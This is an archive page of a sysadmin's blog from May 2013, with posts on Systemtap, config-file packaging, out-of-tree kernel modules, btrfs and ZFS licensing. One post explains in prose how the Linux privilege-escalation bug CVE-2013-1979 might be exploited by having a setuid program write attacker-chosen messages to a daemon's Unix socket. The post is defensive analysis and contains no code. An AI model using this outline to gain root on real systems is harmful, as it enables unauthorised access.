Wandering Thoughts archives

2013-05-30

I find Systemtap oddly frustrating

I currently have a ZFS on Linux performance mystery with sequential NFS writes. One of the things that I want to do to diagnose it is to get a trace of NFS client activity so that I can see exactly what is slow and when. In theory I could reconstruct this from sufficient analysis of the TCP stream; in practice I couldn't make Wireshark do this with some brief poking and this seemed like a good time to learn Systemtap (after all, DTrace can definitely do this sort of stuff with effort).

The result has been surprisingly frustrating, especially when I compare it with my DTrace experience. Before DTrace fans start celebrating too much I think that one reason that DTrace was less frustrating for me is that it so obviously threw me to the wolves very rapidly. DTrace had only a massive manual and within a very short time of poking around with it was apparent that it had nothing to help with NFS activity tracing and I was going to have to read Solaris kernel source.

Systemtap has a lot more attempts at helpful documentation than DTrace does but so far none of them have been led me to solve my problem. I still keep reading, because how can I resist a beginner's guide? After all, I am a Systemtap beginner.

This feeds into the additional frustration that is tapsets. Tapsets are the rough equivalent of DTrace providers, except that DTrace providers are limited, hardcoded into the kernel, and documented. Systemtap tapsets can basically be programmed in Systemtap itself, building interesting advanced capabilities on top of basic ones, and you have the source code. The tantalizing source code that may be most of the documentation you have on what an interesting looking tapset might be able to do for you.

(Things provided by standard tapsets are documented here.)

There are other, lesser frustrations. I can boil them all down to Systemtap having a lot of nice features that it doesn't bother to carry all the way through (both in the core Systemtap and especially in tapsets). DTrace is limited in comparison but at least it's pretty honest about its limitations.

(All of this is a very personal reaction to Systemtap, born of the annoyance I'm currently feeling every time I try to spend more time on my NFS monitoring project. I'm sure that there are plenty of people who are very happy with SystemTap.)

SystemtapFrustration written at 00:39:43; Add Comment

2013-05-28

How you should package local-use configuration files

Some packages ship with systems of split configuration files, where there is a standard configuration file (or several) and then a file that is specifically designed to be customized by the local system administrator. The intention is that the sysadmin can make changes to the local-use config file without having to worry about the package's updates to the standard configuration (and thus without having to merge their changes and the package's changes). Unfortunately packages often make a tragic mistake in the contents of these local files.

It's really simple: local-use config files shouldn't have anything that your package will ever change. A local-use config file should have no long helpful comments documenting everything, no sample items, no anything. All it should have is a comment saying roughly 'this is where you make local changes; for a discussion of what can go here, see ...'.

(And the contents of that comment should be designed so that they don't have to change.)

All of the documentation comments and commented out examples and so on are well intentioned but fatally flawed. It's almost guaranteed that at some point the upstream package will decide (or need to) rewrite the documentation, add or fix examples, and so on. At that point you've created a change conflict: both your package update and the local sysadmin have changed the same file and it's up to the local sysadmin to reconcile the result (or to ignore it, which has various consequences). And this is a packaging failure.

Sometimes the upstream package will ship with such a content heavy local-use configuration file. You should not package this file as is; instead you should move it to be a documentation file and package a new minimal file as the local-use configuration file.

(One package that commits this error is the privoxy RPM for Fedora. Its /etc/privoxy/user.action file is just full of helpful comments and examples, which of course have sometimes changed between versions.)

PackagingLocalConfigFiles written at 23:44:45; Add Comment

2013-05-24

Understanding how CVE-2013-1979 might be exploited

CVE-2013-1979 is a more or less just-released locally exploitable 'gives root' Linux kernel vulnerability. Usually when I read CVE bug descriptions I can get at least a vague sense of how something would be exploitable, but this one puzzled me; I could see how the bug was not good but I couldn't see how it would be exploitable. Even the proof of concept code didn't particularly clear this up.

As described in the Red Hat bugzilla the core bug is:

Commit 257b5358b32f ("scm: Capture the full credentials of the scm sender") changed the credentials passing code to pass in the effective uid/gid instead of the real uid/gid.

(See also the Debian CVE entry.)

The first thing to understand is this 'credentials passing'. Simplified, it allows a program that's reading input from a Unix socket to discover the UID and GID of the process that sent the input. Programs can use this to easily implement access control (only certain UIDs can send them input) or authorization (certain UIDs are allowed to do special things), or just use the information for better logging and so on. Crucially, the sending program doesn't need to do anything special to enable this; it's entirely handled by the receiving program. The bug is that at one point the kernel code was changed to tell the receiving program the effective UID (and GID) of the sender, not their real UID and GID. This sounds relatively harmless, but it turns out it isn't. Here's how I think you exploit this.

First you need to find a program or a daemon that uses credentials on Unix domain sockets to make access or authorization decisions and that gives root special privileges. It probably also needs to act on simple, single messages; you connect to it, send it a message, and it does stuff for you. The ideal situation is something that accepts newline delimited ASCII and doesn't drop connections if you send it bad messages. Next you need to find a setuid program that can be tricked into writing a message that you control to standard output or standard error (possibly among other messages). The proof of concept code suggests that that su can be coaxed into doing this under some situations, for selected messages.

(Embedding newlines in command line arguments clearly helps here.)

To perform the actual exploit your wrapper program creates a Unix socket connection to the victim program or daemon, makes the socket connection its standard output and/or standard error, then runs su (or whatever) in such a way that it will print out your evil message. Since this message is actually being printed by a setuid program the daemon will see a valid message being sent to it by a privileged (effective) UID 0 process and proceed to carry out whatever evil you've asked it do for you.

Whether this is exploitable on any particular Linux system depends a lot on what you have running. Building a real exploit would probably take a fair amount of work because I think that most common daemons that talk over Unix domain sockets (such as the DBus daemon) use encoded wire protocols, not simple ASCII messages.

(Possibly I'm wrong here and there's a candidate daemon I'm missing. In any case there's a fix out now so you should be updating pretty fast.)

UnderstandingCredentialsCVE written at 16:00:46; Add Comment

2013-05-19

The technical effects of being an out of tree Linux kernel module

Suppose that you have a kernel module that is not in the mainstream kernel source for one reason or another. Perhaps it is license compatible but just not integrated for various reasons (as is the case with IET) or perhaps it is license incompatible (as is the case with ZFS on Linux). This non-inclusion has a number of cultural effects, but it also has real technical effects. Although I've mentioned them before, today I want to talk about them in some detail.

The first thing to know is that the Linux kernel does not have a stable kernel API for modules; how a module interacts with the rest of the kernel can and will change without notice. When your module is part of the kernel source, changing it to cope with the API change is generally the responsibility of the kernel developer who wants to make the API change. When your module is not in the kernel tree, not only is changing its code your job but so is even knowing about the API change. And API changes are not always obvious because sometimes they're things like changes in locking requirements or how you are supposed to use existing functions.

(Sometimes they are semi-obvious, like changing just what arguments a function takes. You do pay attention to all warning messages that show up when building your kernel module, right?)

Any number of people would like this to change but it isn't going to. The Linux kernel development process is optimized for in-tree code and not for out of tree code. If your out of tree code cannot be included in the kernel for various reasons, that's tough luck but the kernel developers really don't care that much (as a general rule). Locking themselves down to any stable module API would reduce their ability to improve and evolve the kernel code.

The next effect is pragmatic: if your code is not in the kernel tree, almost no one will look at it (and this includes automated scans over the kernel source code that look for various things) or do things to it. This is great if you're possessive about your code but it means that you're missing out on the quality checking that this creates, all of the little janitorial cleanups that people do, and if there is a bug then your module's developers are the only people who are looking at it.

(In some quarters it's fashionable to think that the Linux kernel developers are all clowns and cannot possibly contribute anything worthwhile to your code. This is a major mistake. Among other things they're basically certain to know the overall Linux kernel environment better than you do.)

A related issue is that the kernel developers try not to create bugs and regressions in in-tree code, especially if it's considered important (which, say, a commonly used filesystem will be); if one is created anyways a bunch of people will go looking to try to fix it. It's almost certain that no official kernel release would go out that broke a significant filesystem; the change that created the breakage would be identified and then reverted, with the change's developer told to try again. If your module is not in the tree, well, you're on your own. Performance regressions or actual breakages are your problem to diagnose and then either fix or try to argue the kernel developers into changing their side of the problem.

(And they may not, especially if your code is license-incompatible with the kernel and most especially if their change actually improves in-tree code and performance and so on.)

All of this means an out of tree kernel module requires more ongoing development work than an in-tree kernel module. In-tree kernel modules generally get somewhat of a ride from general kernel developers; out of tree modules do not and have to make up for it with time from their own developers. One predictable result is that many out of tree modules don't necessarily support all kernel versions, including kernel versions that sysadmins may want to use. A worst case situation with out of tree modules is that the developers simply stop updating the module for new kernels; any users of the module are then orphaned on old kernels.

TechnicalNonGPLKernelModules written at 01:19:52; Add Comment

2013-05-17

Why I'm not considering btrfs for our future fileservers just yet

In a comment on yesterday's entry I was asked:

Could you elaborate on the "btrfs does not qualify" part?

What's missing? How likely do you think this to change in the near future?

I will give a simple looking answer that conceals big depths: what's missing is a btrfs webpage that doesn't say 'run the latest kernel.org kernel' and a Fedora release that doesn't say 'btrfs is still experimental and is included as a technology preview' (which is what Fedora 18 says). It's possible that btrfs is more mature and ready than I think it is, but if so the btrfs people are doing a terrible job of publicizing this. Fundamentally I want to be using something that the developers consider 'mature' or at least 'ready' and I don't want us to be among the first pioneers with a production deployment of decent size in a challenging environment.

Pragmatically there is nothing that btrfs can do to make us consider it in the near future, for reasons I wrote about two years ago in an entry on the timing of production btrfs deployments. If btrfs magically became perfect tomorrow, it would only appear in an Ubuntu LTS release in 2014 and an Red Hat Enterprise release in, well, who knows but probably not this year.

(The current Ubuntu 12.04 LTS has btrfs v3.2, whereas btrfs is up to v3.9 already. The btrfs changelog shows the scope of a year's evolution.)

As far as what in specific is missing, well, I have to confess that I haven't looked at the current state of btrfs in much detail and so I don't have specific answers. I poke at btrfs vaguely every so often; generally I discover something that strikes me as alarming and then I go away again. Since btrfs is never going to be exactly like ZFS, I can't just directly translate our our ZFS fileserver design to btrfs and then complain about what's missing or different. To have a really informed opinion on what btrfs needed and what was wrong with it, I'd have to do a btrfs-based fileserver design from scratch, trying to harmonize what we think we want (which has been shaped by what ZFS gives us) with what btrfs gives us. So far there seems to be no real point to doing that before btrfs stabilizes.

(I'm starting to think that btrfs and ZFS have fundamentally different visions about some things, but that needs some more reading and another entry.)

Sidebar: ZFS on Linux maturity versus btrfs maturity

You might ask why I'm willing to consider ZFS on Linux even though it's a relatively young project, just like btrfs. The answer is that the two are fundamentally different. The ZFS part of ZoL on Linux is generally a mature and well proven codebase; most of the uncertain new bits are just for fitting it into Linux.

BtrfsWhyNotYet written at 01:29:56; Add Comment

2013-05-16

Why ZFS's CDDL license matters for ZFS on Linux

In a G+ conversation about ZFS I read the following:

[...] so, why use BTRFS at all? :-) Just the fact that it's GPL (and so able to be embedded into the kernel source tree) doesn't seem enough, specially considering that CDDL (the ZFS license) is a bona fide open source license, [...]

On the whole I like ZFS on Linux, but let's not mince words here: this licensing issue is a big issue. Were btrfs and ZFS close to general parity, it would be a very strong push towards btrfs.

That ZFS is CDDL licensed means that it can never be included in the Linux kernel source. It may mean that it can't be prepackaged in binary form by distributions, or at least by distributions that care strongly about licensing issues. The CDDL is part of what makes it extremely unlikely that Red Hat Enterprise or Ubuntu LTS will ever officially support ZoL, making it always be a 'batteries not included, you get to integrate it' portion of the system.

That ZFS will not be included in the Linux kernel source (because of the CDDL among other reasons) means that you are more at risk of developers ceasing to update ZFS for newer kernels (among other less important effects).

(Being in the Linux kernel source is no guarantee that code will be maintained, but it increases the chances a fair bit.)

These are risks that we'd be willing and able to take on, so they aren't real obstacles for us using ZoL if that turns out to be the best option for new fileservers. But they still weigh on my mind and there are any number of places where they are going to be real issues, sometimes killer ones.

(I've written about this before.)

(Given the current situation with 4k disks, we're already looking at recreating pools when we move them to a new fileserver infrastructure. At that point we could just as easily migrate from ZFS to something else, if the something else was good enough. Btrfs currently does not qualify.)

ZFSWhyCDDLMatters written at 01:16:45; Add Comment

By day for May 2013: 16 17 19 24 28 30; before May; after May.

Page tools: See As Normal.
Search:
Login: Password:
Atom Syndication: Recent Pages, Recent Comments.

This dinky wiki is brought to you by the Insane Hackers Guild, Python sub-branch.